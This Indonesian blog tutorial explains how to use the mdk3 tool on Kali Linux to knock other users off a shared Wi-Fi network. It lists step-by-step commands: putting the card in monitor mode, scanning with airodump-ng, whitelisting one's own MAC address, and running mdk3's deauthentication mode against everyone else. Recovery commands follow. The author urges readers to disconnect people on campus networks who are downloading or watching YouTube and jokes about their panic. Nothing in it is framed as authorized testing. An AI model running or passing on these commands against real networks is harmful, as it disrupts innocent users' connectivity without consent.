Cara Menggunakan mdk3 KALI LINUX




Bagi yang kesal dengan jaringan kampus nya udah lelet, di pake buat download atau youtube’an lagi, ini bisa jadi solusinya, hehehehe….

Tapi sebelum mempraktekkan tutorial ini, sebaiknya Anda lebih berhati-hati dalam menggunakannya, karena saya tidak bertanggung jawab atas kesalahan yang Anda tanggung sendiri, saya memberi tutorial ini hanya untuk menambah wawasan kita semua tentunya.

mdk3…
apa sih mdk3 itu..?
mdk3 adalah singkatan dari “Murder Death Kill 3” ngeri juga ya artinya kalau di translate, hehehe…
mdk3 adalah alat nirkabel yang dikemas dalam Backtrack dan Kali Linux.
Supaya lebih mudah di ingat aja ya.., jadi gini.. mdk3 itu berfungsi untuk mutusin jaringan wifi orang lain yang sedang terkoneksi ke salah satu jaringan.

Bayangkan Anda adalah CEO sebuah usaha kecil. Anda pergi bekerja dan terhubung dengan WIFI hotel. Sangat penting bagi Anda untuk mendapatkan beberapa informasi yang dikirim malam ini. Tapi apa yang terjadi saat pesaing Anda duduk di ruangan sebelah, dan dia membunuh jaringan anda dengan mdk3? Anda mungkin kehilangan kontak penting sebagai hasilnya. Bisnis Anda mungkin hancur/menderita. Jadi sekarang Anda melihat seberapa berbaya mdk3 dalam serangan jaringan, mdk3 tidak menghancurkan data atau mencuri, tapi ini adalah alat yang sempurna untuk =…..

Jadi inti nya, yang lagi nyari tugas atau lagi belajar…,, jangan pernah pake mdk3 ya, cukup putusin jaringan orang yang lagi download atau youtube’an aja, itu pun kalau yang di download atau yang di tonton di youtube bukan hal yang penting-penting amat sih..,, hehehehe..

OK.. langsung aja…

Buka terminal terminal Anda, dan jalankan perintah berikut:

Step 1: iw dev wlan0 interface add wlan0mon type monitor

Screenshot from 2017-04-20 19-52-17

Step 2: airodump-ng wlan0mon

t.png

Penjelasan pada step ini: Kita terhubung dengan jaringan wlan0mon, dan cara stop nya cukup tekan CTRL+C

Step 3: ifconfig wlan0

tt.png

Fungsi ifconfig wlan0 adalah untuk mengetahui ip address kita yang terhubung dengan jaringan wifi, pilih mac address kamu supaya nanti tidak termasuk dalam koneksi yang akan di putus melalui mdk3.

Step 4: echo mac address kamu >>whitelist.txt

t.png

whitelist.txt berfungsi untuk menyimpan mac address kita, supaya nanti tidak termasuk ke dalam koneksi yang akan di putus mdk3, karena mac address yang tidak tersimpan di dalam whitelist akan di putus semua koneksi nya, jadi masukan juga mac address perangkat lain jika Anda tidak ingin memutuskan koneksi perangkat tersebut.

Step 5: mdk3 wlan0mon d -w whitelist.txt

Screenshot from 2017-04-20 20-22-16.png

Dan…… sekarang¬†lihat ekspresi orang disekitar Anda, mereka terlihat panik..?
Jika iya, berarti Anda berhasil memutuskan koneksi orang.

Sekali lagi ingat, gunakan dengan bijak, cukup gunakan mdk3 untuk orang yang lagi download atau youtbe’an untuk hal-hal yang kurang penting, yang lagi nyari tugas atau yang lagi kerja jangan pernah di putus ya, cara memfilternya ya harus tau mac address tersebut, susah dong..?, iya,… hahahaha..

note: jika wifi kita tidak menyala sehabis di coba putus koneksinya, coba jalankan perintah berikut:

step 1: airmon-ng stop wlan0mon
step 2: service network-manager start

Cara alternatif:

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

atau juga bisa menggunakan cara berikut:

service network-manager restart